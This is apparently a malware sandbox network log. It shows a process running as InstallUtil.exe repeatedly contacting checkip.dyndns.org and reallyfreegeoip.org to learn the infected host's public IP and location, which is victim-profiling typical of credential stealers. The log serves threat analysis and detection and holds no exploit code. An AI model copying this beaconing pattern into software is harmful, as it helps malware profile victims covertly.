                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:15.316196918 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bb5d92978e63a658a5e733d315aa8de6
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.5 | 49712 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:11.546088934 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:15.104648113 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: ec3f50ac839e4ae9d386447ae5d3009c
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.5 | 49728 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:15.754805088 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:16.323411942 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:16 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 28818396dbaf9b6fa87fce03fd7db588
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.5 | 49729 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:15.943516016 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:16.520503044 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:16 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4d668e7fe0ea412fe465d5f8f3917e6a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.5 | 49737 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:17.592659950 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:18.189933062 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275291920 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275808096 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.277539015 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:17.595375061 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:18.169970989 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275223017 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275738955 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.277507067 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:19.278538942 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:20.706177950 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 309742cf57c2cde1bd2bbfd07b617149
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.706542015 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 309742cf57c2cde1bd2bbfd07b617149
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707326889 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 309742cf57c2cde1bd2bbfd07b617149
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.710355043 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:20.885792971 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 28038a6ef2912c166ad8e24ad440b3e2
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:22.627741098 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:22.782272100 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f170492d247a8473abbe7d5b3f3291d1
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.5 | 49752 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:19.435147047 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:20.706379890 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7c50b6da358710e8365359efcc7b15df
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.706975937 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7c50b6da358710e8365359efcc7b15df
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707871914 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7c50b6da358710e8365359efcc7b15df
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.5 | 49753 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:19.454963923 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:20.706418037 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 005f47027c3813cb060380acddc47764
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707040071 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 005f47027c3813cb060380acddc47764
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707923889 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 005f47027c3813cb060380acddc47764
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.5 | 49763 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:22.382710934 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:22.945955038 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4061b53e4c4a6f0bdb21f3c19ed143a3
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.5 | 49762 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:22.407651901 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:22.975163937 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 83ff38d2d14fc0c35650d7d90a4441cf
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.5 | 49776 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:23.471653938 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:24.033001900 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4bf88d1db95acb23c5e14eaf965b60e7
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.5 | 49779 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:23.649684906 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:24.232850075 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:24 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 0c48c5933192ffc8189b991ecd71d231
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.5 | 49787 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:25.726545095 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:26.295466900 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: c0fc13eda452e83e91087ed27b80f17b
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.5 | 49788 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:25.745522022 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:26.325903893 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 28a14b505bfe333e6e5376f77fca8366
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.5 | 49801 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:27.030214071 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:27.596740007 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: a59db89a213a8bac1432df10a84ac563
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.2.5 | 49802 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:27.052342892 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:27.616992950 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: eeadb4b6dc8b00655cc4ba30dd4efdeb
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                20 | 192.168.2.5 | 49810 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:28.296086073 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:28.858182907 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:28 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 5cbde43306848750f7ef8bc93fbad41b
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                21 | 192.168.2.5 | 49823 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:29.484325886 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:30.053703070 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:29 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4e9b4c3ce75193546e8c3cfc54b29dc3
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                22 | 192.168.2.5 | 49830 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:30.985053062 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:31.593583107 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 45715a58e6cd721091ef022f315e98fb
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                23 | 192.168.2.5 | 49842 | 158.101.44.242 | 80 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Oct 8, 2024 12:45:32.227133989 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:32.798190117 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:32 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 194c279511c543fd622bf845f9bcfd88
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:44:59 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:44:59 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:59 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50631
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrD%2B6UdZ8v1Zrk0pVqHEdQqbDg2K4mn4SFyVh2upVpFx9Bqz1ruJREmWGE4%2FDoVzXNLyGRxlsLa88z0kG1iUVa4sSBc02UIwChYgHNEBA1O6fzPv%2Fzb460ri6NUR4%2FiNb0q3uENw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf589effb27196c-EWR
                                                2024-10-08 10:44:59 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:44:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:00 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:00 UTC | 706 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:00 GMT
